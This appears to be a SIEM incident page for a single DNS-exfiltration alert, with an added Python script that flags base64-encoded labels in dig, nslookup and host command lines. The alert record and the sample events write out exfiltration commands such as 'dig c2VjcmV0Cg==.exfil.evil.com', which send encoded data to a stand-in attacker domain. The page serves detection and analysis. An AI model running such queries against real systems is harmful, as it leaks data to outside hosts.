Incident Overview

Incident ID CINC-20251220-5494C958
Severity Medium (70)
Status new
Alert Count 1
Host Count 1

Timeline

First Seen 2025-12-14 04:34:41
Last Seen 2025-12-14 04:34:41
Duration 0d 0h 0m
Created 2025-12-20 13:23
Updated 2026-01-13 15:14

Kill Chain Analysis

Phases: Reconnaissance, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration, Impact
Observed Tactics:
Exfiltration
Techniques:
Exfiltration Over Alternative Protocol

Affected Hosts (1)

siemdev-14

Related Alerts (1)

Severity: High
Status: new
Hostname: siemdev-14
Description: Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. Investigate the process tree.
Tactic: Exfiltration
Command Line: dig c2VjcmV0Cg==.exfil.evil.com
Time: 12-14 04:34

Note: the leading DNS label c2VjcmV0Cg== is base64 and decodes to the string "secret" followed by a newline, so the query itself carries data to the authoritative server for exfil.evil.com. A single dig invocation is consistent with a test or a first probe; the process tree and any further queries to that domain (other labels, other hosts) determine whether this is a one-off or an ongoing channel.
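The detection logic below is an added example written for this page; it is not part of the incident record and not the SIEM's own rule. It takes process-creation events shaped like the alert above (a hostname and a command line, both assumed field names), picks out invocations of common resolver tools, and flags query names whose leading labels look base64-encoded, decoding them to recover what was sent. The sample events are constructed; the first one mirrors the alert on this page. The heuristics (minimum label length, mixed character classes, treating the last two labels as the attacker's registered domain) are tuning choices, not properties of the technique.

```python
"""Flag DNS-client command lines whose query name carries an encoded label.

Added example for this incident page; constructed input, heuristic thresholds.
"""
import base64
import binascii
import math
import os
import re
import shlex
from collections import Counter
from dataclasses import dataclass
from typing import Optional

# Resolver tools whose command line exposes the queried name (assumed list).
DNS_CLIENTS = {"dig", "nslookup", "host"}
# base64 / base64url alphabet, 8+ chars so ordinary labels like "www" are skipped.
ENCODED_LABEL = re.compile(r"^[A-Za-z0-9+/=_-]{8,}$")


@dataclass
class Finding:
    hostname: str
    cmdline: str
    qname: str
    label: str
    decoded: Optional[bytes]
    entropy: float


def shannon_entropy(s: str) -> float:
    """Bits per character of the label; supporting signal, not a hard rule."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def decode_label(label: str) -> Optional[bytes]:
    """Decode a base64 or base64url label, restoring padding the sender stripped."""
    s = label.replace("-", "+").replace("_", "/")
    s += "=" * (-len(s) % 4)
    try:
        return base64.b64decode(s, validate=True)
    except (binascii.Error, ValueError):
        return None


def looks_encoded(label: str) -> bool:
    """Heuristic: base64 alphabet, long enough, at least two character classes
    (rules out long but all-lowercase hostnames such as CDN labels), decodable."""
    if not ENCODED_LABEL.match(label):
        return False
    classes = sum(bool(re.search(p, label)) for p in (r"[a-z]", r"[A-Z]", r"[0-9]"))
    return classes >= 2 and decode_label(label) is not None


def extract_qname(cmdline: str) -> Optional[str]:
    """Return the queried name from a dig/nslookup/host command line, else None."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:
        return None
    if not argv or os.path.basename(argv[0]) not in DNS_CLIENTS:
        return None
    for tok in argv[1:]:
        if not tok or tok[0] in "-+@":          # options, dig +flags, @server
            continue
        if "." in tok and not re.fullmatch(r"[\d.]+", tok):   # skip IP literals
            return tok.rstrip(".")               # keep case: it matters for base64
    return None


def scan_events(events) -> list:
    """Run the check over process-creation events (dicts with hostname/cmdline)."""
    findings = []
    for ev in events:
        qname = extract_qname(ev["cmdline"])
        if not qname:
            continue
        labels = qname.split(".")
        # Assumption: the last two labels are the registered domain; only the
        # labels in front of it can vary per query and carry data.
        for label in labels[:-2]:
            if looks_encoded(label):
                findings.append(Finding(ev["hostname"], ev["cmdline"], qname, label,
                                        decode_label(label), shannon_entropy(label)))
    return findings


# Constructed sample events; the first mirrors the alert on this page.
SAMPLE_EVENTS = [
    {"hostname": "siemdev-14", "cmdline": "dig c2VjcmV0Cg==.exfil.evil.com"},
    {"hostname": "siemdev-14", "cmdline": "dig +short www.example.com"},
    {"hostname": "siemdev-14", "cmdline": "nslookup -type=TXT aGVsbG8gd29ybGQ.exfil.evil.com 8.8.8.8"},
    {"hostname": "siemdev-14", "cmdline": "host mail.example.com"},
    {"hostname": "siemdev-14", "cmdline": "ls -la /tmp"},
]

if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f"{f.hostname}: {f.qname} label={f.label!r} "
              f"entropy={f.entropy:.2f} decoded={f.decoded!r}")
```

Run against the sample events it reports two findings, the page's query (decoding to "secret" plus newline) and the nslookup one (decoding to "hello world"), and ignores the ordinary lookups. Command-line inspection only catches exfiltration through a resolver binary; a process that opens its own socket to port 53 leaves no such command line, so the same label heuristics belong on resolver or network DNS logs as well.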